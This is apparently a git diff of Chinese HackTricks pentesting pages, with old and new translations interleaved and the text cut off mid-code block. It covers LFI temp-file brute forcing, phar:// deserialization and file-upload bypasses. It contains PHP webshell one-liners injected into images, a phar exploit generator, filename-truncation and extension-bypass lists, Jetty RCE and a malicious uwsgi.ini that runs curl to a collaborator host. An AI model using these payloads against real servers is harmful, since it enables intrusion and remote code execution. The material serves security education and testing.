因此,为了 **避免 DoS**,假设 **攻击者将同时使用 100 个连接**,而 php-fmp 的最大处理时间(`request_terminate_timeout`)为 **30 秒**。因此,每秒可以生成的 **临时文件** 数量`100*20/30 = 66.67`
然后,要生成 **10000 个文件**,攻击者需要:**`10000/66.67 = 150 秒`**(要生成 **100000 个文件**,时间将**25 分钟**)。
然后,攻击者需要 **`10000/66.67 = 150s`** 来生成 **10000 个文件**(生成 **100000 个文件** 的时间**25 分钟**)。
然后,攻击者可以使用这**100 个连接** 执行 **搜索暴力破解**。假设速度为 300 次/秒,利用此漏洞所需的时间如下:
然后,攻击者可以使用这 **100 个连接** 来执行 **暴力搜索**。 \*\*\*\* 假设速度为 300 req/s,利用此漏洞所需的时间如下:
* 56800235584 / 10000 / 300 / 3600 \~= **5.25 小时**50% 的概率在 2.63 小时内
* (有 100000 个文件56800235584 / 100000 / 300 / 3600 \~= **0.525 小时**50% 的概率在 0.263 小时内
* 56800235584 / 10000 / 300 / 3600 \~= **5.25 小时**2.63 小时有 50% 的机会
* (有 100000 个文件56800235584 / 100000 / 300 / 3600 \~= **0.525 小时**0.263 小时有 50% 的机会
是的,可以在 EC2 中型实例中生成 100000 个临时文件:
是的,可以在一个中等大小的 EC2 实例中生成 100000 个临时文件:
<figure><img src="../../.gitbook/assets/image (240).png" alt=""><figcaption></figcaption></figure>
{% hint style="warning" %}
请注意,为了触发超时,**只需包含易受攻击的 LFI 页面**,使其进入永久包含循环。
请注意,为了触发超时,**只需包含易受攻击的 LFI 页面**,使其进入一个永恒的包含循环。
{% endhint %}
## Nginx
默认情况下Nginx 支持 **512 个并行连接**(此数字可以提高)。
默认情况下Nginx 似乎支持 **512 个并行连接**(这个数字可以提高)。
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

File diff suppressed because one or more lines are too long

View file

@ -1,30 +1,33 @@
# phar:// 反序列化
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti一个由黑客创建的高级**漏洞赏金平台**!今天加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
**Phar** 文件PHP Archive文件以**序列化格式包含元数据**,因此,在解析时,此**元数据**将被**反序列化**,您可以尝试利用**PHP**代码中的**反序列化**漏洞。
**Phar** 文件PHP Archive文件 **包含序列化格式的元数据**,因此,当解析时,这个 **元数据** 会被 **反序列化**,你可以尝试利用 **PHP** 代码中的 **反序列化** 漏洞。
种特性最好的一点是即使使用不会评估PHP代码的PHP函数如**file\_get\_contents()、fopen()、file()或file\_exists()、md5\_file()、filemtime()或filesize()**,此反序列化也会发生
个特性的最佳之处在于,即使使用不执行 PHP 代码的 PHP 函数,如 **file\_get\_contents()、fopen()、file() 或 file\_exists()、md5\_file()、filemtime() 或 filesize()**,也会发生反序列化
因此,想象一种情况,您可以使用**`phar://`** 协议使PHP网页获取任意文件的大小并在代码中找到类似以下类的情况
所以,想象一个情况,你可以让一个 PHP 网站使用 **`phar://`** 协议获取任意文件的大小,并且在代码中你发现一个类似于以下的 **类**
{% code title="vunl.php" %}
```php
<?php
class AnyClass {
@ -42,7 +45,7 @@ filesize("phar://test.phar"); #The attacker can control this path
```
{% endcode %}
您可以创建一个 **phar** 文件,当加载时,将 **滥用这个类来执行任意命令**,类似于以下内容:
您可以创建一个 **phar** 文件,当加载时**利用这个类执行任意命令**,使用类似以下内容:
{% code title="create_phar.php" %}
```php
@ -72,8 +75,8 @@ $phar->stopBuffering();
```
{% endcode %}
注意如何在phar文件的开头添加**JPG的魔术字节**(`\xff\xd8\xff`)以**绕过**可能的文件**上传****限制**。\
使用以下命令**编译**`test.phar`文件:
注意 **JPG 的魔术字节** (`\xff\xd8\xff`) 被添加到 phar 文件的开头,以 **绕过** **可能的** 文件 **上传** **限制**。\
**编译** `test.phar` 文件:
```bash
php --define phar.readonly=0 create_phar.php
```
@ -81,26 +84,27 @@ php --define phar.readonly=0 create_phar.php
```bash
php vuln.php
```
### 参考资料
### 参考文献
{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Bug赏金提示****注册**Intigriti一个由黑客创建的高级**bug赏金平台**!立即加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# 文件上传
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要攻破不可攻破的 - **我们正在招聘!**(需要流利的波兰语书面和口头表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻破不可攻破的 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -25,21 +26,21 @@
其他有用的扩展名:
* **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._phps_, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
* **在PHPv8中工作**: _.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_
* **在 PHPv8 中工作**: _.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_
* **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
* **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
* **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
* **Flash**: _.swf_
* **Perl**: _.pl, .cgi_
* **Erlang Yaws Web Server**: _.yaws_
* **Erlang Yaws Web 服务器**: _.yaws_
### 绕过文件扩展名检查
1. 如果适用,**检查****之前的扩展名**。还要使用一些**大写字母**进行测试_pHp, .pHP5, .PhAr ..._
2. _检查**在执行扩展名之前添加一个有效扩展名**也使用之前的扩展名_
1. 如果适用,**检查** **之前的扩展名**。也可以使用一些 **大写字母** 测试它们_pHp, .pHP5, .PhAr ..._
2. _检查 **在执行扩展名之前添加有效扩展名**也使用之前的扩展名_
* _file.png.php_
* _file.png.Php5_
3. 尝试在末尾添加**特殊字符**。您可以使用Burp来**暴力破解**所有**ascii**和**Unicode**字符。 (_请注意您还可以尝试使用**先前提到的扩展名**_)
3. 尝试在末尾添加 **特殊字符**。你可以使用 Burp 来 **暴力破解** 所有的 **ascii****Unicode** 字符。 (_注意你也可以尝试使用 **之前** 提到的 **扩展名**_)
* _file.php%20_
* _file.php%0a_
* _file.php%00_
@ -49,7 +50,7 @@
* _file._
* _file.php...._
* _file.pHp5...._
4. 尝试绕过保护,**欺骗服务器端的扩展名解析器**,使用诸如**加倍扩展名**或在扩展名之间**添加垃圾**数据(**空**字节等技术。_您还可以使用**先前的扩展名**来准备更好的有效负载。_
4. 尝试通过 **欺骗服务器端的扩展解析器** 来绕过保护,使用像 **双重** 扩展名或 **添加垃圾** 数据(**null** 字节在扩展名之间。_你也可以使用 **之前的扩展名** 来准备更好的有效载荷。_
* _file.png.php_
* _file.png.pHp5_
* _file.php#.png_
@ -58,74 +59,75 @@
* _file.php%0a.png_
* _file.php%0d%0a.png_
* _file.phpJunk123png_
5. 在先前检查的基础上**添加另一层扩展名**
5. 在之前的检查中添加 **另一层扩展名**
* _file.png.jpg.php_
* _file.php%00.png%00.jpg_
6. 尝试将**执行扩展名放在有效扩展名之前**,希望服务器配置错误。 用于利用Apache配置错误其中任何带有扩展名**.php**的内容都会执行代码,但不一定以**.php**结尾
6. 尝试将 **exec 扩展名放在有效扩展名之前**,并祈祷服务器配置错误。(有助于利用 Apache 配置错误,其中任何带有扩展名 **_**.php**_** 的内容,但不一定以 .php 结尾的内容将执行代码
* _例如file.php.png_
7. 在**Windows**中使用**NTFS备用数据流ADS**。在这种情况下,会在被禁止的扩展名之后和允许的扩展名之前插入冒号字符“:”。结果,服务器上将创建一个带有被禁止扩展名的**空文件**例如“file.asax:.jpg”。稍后可以使用其他技术编辑此文件,例如使用其短文件名。 “**::$data**”模式也可用于创建非空文件。因此在此模式后添加一个点字符也可能有助于绕过进一步的限制例如“file.asp::$data.”)
8. 尝试突破文件名限制。有效扩展名被截断恶意PHP留下。 AAA<--SNIP-->AAA.php
7. 在 **Windows** 中使用 **NTFS 备用数据流 (ADS)**。在这种情况下,冒号字符 “:” 将插入在禁止扩展名之后和允许扩展名之前。因此,将在服务器上创建一个 **带有禁止扩展名的空文件**(例如 “file.asax:.jpg”。该文件可以稍后使用其他技术进行编辑,例如使用其短文件名。 “**::$data**” 模式也可用于创建非空文件。因此,在此模式后添加一个点字符也可能有助于绕过进一步的限制(例如 “file.asp::$data.”)
8. 尝试打破文件名限制。有效扩展名被截断。恶意 PHP 被保留。 AAA<--SNIP-->AAA.php
```
# Linux最大255字节
# Linux 最大 255 字节
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # 在这里减去4并添加.png
# 上传文件并检查响应允许多少字符。假设236
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # 在这里减去 4 并添加 .png
# 上传文件并检查响应允许多少字符。假设 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# 制作有效
# 制作有效载
AAA<--SNIP 232 A-->AAA.php.png
```
### 绕过内容类型、魔术数字、压缩和调整大小
* 通过将**Content-Type** **头**的**值**设置为_image/png__text/plain__application/octet-stream_ 来绕过**Content-Type**检查。
* 通过将 **Content-Type** **头****值** 设置为以下内容来绕过 **Content-Type** 检查_image/png_ , _text/plain , application/octet-stream_
1. Content-Type **字典**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
* 通过在文件开头添加**真实图像的字节**(混淆 _file_ 命令)或在**元数据**中引入shell来绕过**魔术数字**检查\
* 通过在文件开头添加 **真实图像的字节** 来绕过 **魔术数字** 检查(混淆 _file_ 命令) **元数据** 中引入 shell\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
或者你也可以直接在图像中**引入有效载**\
`\` 或者你也可以 **直接在图像中引入有效载**\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
* 如果**压缩**被添加到您的图像中例如使用一些标准的PHP库如[PHP-GD](https://www.php.net/manual/fr/book.image.php),之前的技术将不再有用。然而,您可以使用**PLTE块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) 来插入一些文本,以便**在压缩后存活**
* [**带有代码的Github链接**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_plte\_png.php)
* 网页也可能会**调整**图像大小例如使用PHP-GD函数 `imagecopyresized``imagecopyresampled`。然而,您可以使用**IDAT块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) 来插入一些文本,以便**在压缩后存活**
* [**带有代码的Github链接**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_idat\_png.php)
* 另一种技术是创建一个有效负载,**在图像调整大小后存活**使用PHP-GD函数 `thumbnailImage`。然而,您可以使用**tEXt块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) 来插入一些文本,以便**在压缩后存活**
* [**带有代码的Github链接**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
* 如果 **压缩被添加到你的图像**,例如使用一些标准的 PHP 库如 [PHP-GD](https://www.php.net/manual/fr/book.image.php),那么之前的技术将无效。然而,你可以使用 **PLTE 块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) 插入一些文本以 **在压缩中存活**
* [**带有代码的 GitHub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_plte\_png.php)
* 网页也可能**调整图像大小**,例如使用 PHP-GD 函数 `imagecopyresized``imagecopyresampled`。然而,你可以使用 **IDAT 块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) 插入一些文本以 **在压缩中存活**
* [**带有代码的 GitHub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_idat\_png.php)
* 另一种制作 **在图像调整大小中存活的有效载荷** 的技术,使用 PHP-GD 函数 `thumbnailImage`。然而,你可以使用 **tEXt 块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) 插入一些文本以 **在压缩中存活**
* [**带有代码的 GitHub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
### 其他检查技巧
* 查找一个漏洞来**重命名**已上传的文件(更改扩展名)。
* 找**本地文件包含**漏洞以执行后门。
* 找到一个 **重命名** 已上传文件的漏洞(以更改扩展名)。
* 找到一个 **本地文件包含** 漏洞以执行后门。
* **可能的信息泄露**
1. **多次**上传(并**同时****相同文件****相同名称**
2. 上传一个**与已存在的文件**或**文件夹**同名的文件
3. 上传一个文件,其名称为**“.”、“..”或“…”**。例如,在**Windows**的Apache中,如果应用程序将上传的文件保存在“/www/uploads/”目录中,“.”文件将在“/www/”目录中创建一个名为“uploads”的文件。
4. 在**NTFS**中上传一个可能不容易删除的文件,例如**“…:.jpg”**Windows
5. 在**Windows**中上传一个带有无效字符的文件,例如其名称中的 `|<>*?”`Windows
6. 在**Windows**中使用**保留**(禁止)**名称**上传文件,如 CON、PRN、AUX、NUL、COM1、COM2、COM3、COM4、COM5、COM6、COM7、COM8、COM9、LPT1、LPT2、LPT3、LPT4、LPT5、LPT6、LPT7、LPT8 和 LPT9。
* 还可以尝试**上传一个可执行文件**.exe或一个不太可疑的**.html** 文件,当受害者意外打开时将**执行代码**
1. 上传 **多次**(并且在 **同一时间**)相同名称的 **相同文件**
2. 上传一个 **已经存在****文件****文件夹****名称** 的文件
3. 上传一个 **“.”, “..”, 或 “…” 作为其名称** 的文件。例如,在 Apache 的 **Windows** 中,如果应用程序将上传的文件保存在 “/www/uploads/” 目录中,名称为 “.”文件将 “/www/” 目录中创建一个名为 “uploads” 的文件。
4. 上传一个可能不容易删除的文件,例如 **“…:.jpg”****NTFS** 中。Windows
5. 在 **Windows** 中上传一个包含 **无效字符** 的文件,例如 `|<>*?”` 作为其名称。Windows
6. 在 **Windows** 中上传一个使用 **保留****禁止** **名称** 的文件,例如 CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, 和 LPT9。
* 还可以尝试 **上传一个可执行文件**.exe或一个 **.html**(不太可疑)文件,当受害者意外打开时 **将执行代码**
### 特殊扩展技巧
### 特殊扩展技巧
如果您尝试将文件上传到**PHP服务器**[查看通过**.htaccess**技巧执行代码](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess)。\
如果您尝试将文件上传到**ASP服务器**[查看通过**.config**技巧执行代码](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
如果你尝试将文件上传到 **PHP 服务器** [查看 **.htaccess** 技巧以执行代码](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess)。\
如果你尝试将文件上传到 **ASP 服务器** [查看 **.config** 技巧以执行代码](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
`.phar` 文件类似于Java的 `.jar` 文件但用于PHP可以像PHP文件一样**使用**使用PHP执行它或将其包含在脚本中...
`.phar` 文件类似于 Java 的 `.jar`,但用于 PHP并且可以 **像 PHP 文件一样使用**(通过 PHP 执行或在脚本中包含它...
`.inc` 扩展有时用于仅用于**导入文件**的PHP文件因此某些时候某人可能已经允许**执行**此扩展名
`.inc` 扩展名有时用于仅用于 **导入文件** 的 PHP 文件,因此,在某些时候,可能有人允许 **此扩展名被执行**
## **Jetty RCE**
如果您可以将XML文件上传到Jetty服务器您可以获得[RCE因为**新的 \*.xml 和 \*.war 文件会自动处理**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**。** 因此如下图所示将XML文件上传到 `$JETTY_BASE/webapps/` 并等待shell
如果你可以将 XML 文件上传到 Jetty 服务器,你可以获得 [RCE因为 **新的 \*.xml 和 \*.war 会被自动处理**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** 所以,如下图所示,将 XML 文件上传到 `$JETTY_BASE/webapps/` 并期待 shell
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../.gitbook/assets/image (1047).png>)
## **uWSGI RCE**
有关此漏洞的详细探讨,请查看原始研究:[uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)。
有关此漏洞的详细探索,请查看原始研究:[uWSGI RCE 利用](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)。
如果有能力修改 `.ini` 配置文件则可以利用uWSGI服务器中的远程命令执行RCE漏洞。uWSGI配置文件利用特定语法来包含“魔术”变量、占位符和运算符。值得注意的是'@' 运算符,如 `@(filename)`旨在包含文件的内容。在uWSGI中支持的各种方案中“exec”方案特别强大,允许从进程的标准输出读取数据。当处理 `.ini` 配置文件时,此功能可用于恶意目的,如远程命令执行或任意文件写入/读取。
如果能够修改 `.ini` 配置文件,则可以在 uWSGI 服务器中利用远程命令执行RCE漏洞。uWSGI 配置文件利用特定语法来包含“魔术”变量、占位符和运算符。特别是,`@` 运算符,作为 `@(filename)` 使用,旨在包含文件的内容。在 uWSGI 支持的各种方案中“exec” 方案特别强大,允许从进程的标准输出读取数据。当处理 `.ini` 配置文件时,可以利用此功能进行恶意目的,例如远程命令执行或任意文件写入/读取。
考虑以下有害的 `uwsgi.ini` 文件示例,展示各种方案:
考虑以下有害的 `uwsgi.ini` 文件示例,展示各种方案:
```ini
[uwsgi]
; read from a symbol
@ -143,14 +145,14 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
在解析配置文件时执行有效载荷。为了激活和解析配置uWSGI进程必须重新启动(可能是在崩溃后或由于拒绝服务攻击)或文件必须设置为自动重新加载。如果启用了自动重新加载功能,它会在检测到更改时以指定的间隔重新加载文件。
在解析配置文件时负载的执行会发生。为了激活和解析配置uWSGI 进程必须重新启动(可能是在崩溃后或由于拒绝服务攻击)或文件必须设置为自动重载。如果启用了自动重载功能,在检测到更改时会在指定的时间间隔内重新加载文件。
了解uWSGI配置文件解析的宽松性质至关重要。具体来说讨论的有效载荷可以插入二进制文件如图像或PDF进一步扩大了潜在利用的范围。
理解 uWSGI 配置文件解析的宽松性质至关重要。具体来说,讨论的负载可以插入到二进制文件中(例如图像或 PDF进一步扩大潜在利用的范围。
## **wget文件上传/SSRF技巧**
## **wget 文件上传/SSRF 技巧**
在某些情况下,您可能会发现服务器正在使用**`wget`**来**下载文件**,您可以**指定****URL**。在这些情况下,代码可能会检查下载文件的扩展名是否在白名单中,以确保只有允许下载的文件。然而,**此检查可以被绕过。**\
**Linux**中**文件名**的**最大**长度为**255**,但**wget**会将文件名截断为**236**个字符。您可以**下载一个名为"A"\*232+".php"+".gif"**的文件,这个文件名将**绕过**检查(就像在这个例子中**".gif"**是一个**有效**的扩展名),但`wget`会将文件重命名为**"A"\*232+".php"**。
在某些情况下,您可能会发现服务器正在使用 **`wget`** 来 **下载文件**,并且您可以 **指示** **URL**。在这些情况下,代码可能会检查下载文件的扩展名是否在白名单中,以确保仅下载允许的文件。然而,**此检查可以被绕过。**\
**linux** 中 **文件名****最大** 长度为 **255**,但是 **wget** 会将文件名截断为 **236** 个字符。您可以 **下载一个名为 "A"\*232+".php"+".gif"** 的文件,这个文件名将 **绕过** **检查**(因为在这个例子中 **".gif"** 是一个 **有效** 扩展名),但 `wget` 会将文件 **重命名****"A"\*232+".php"**。
```bash
#Create file and HTTP server
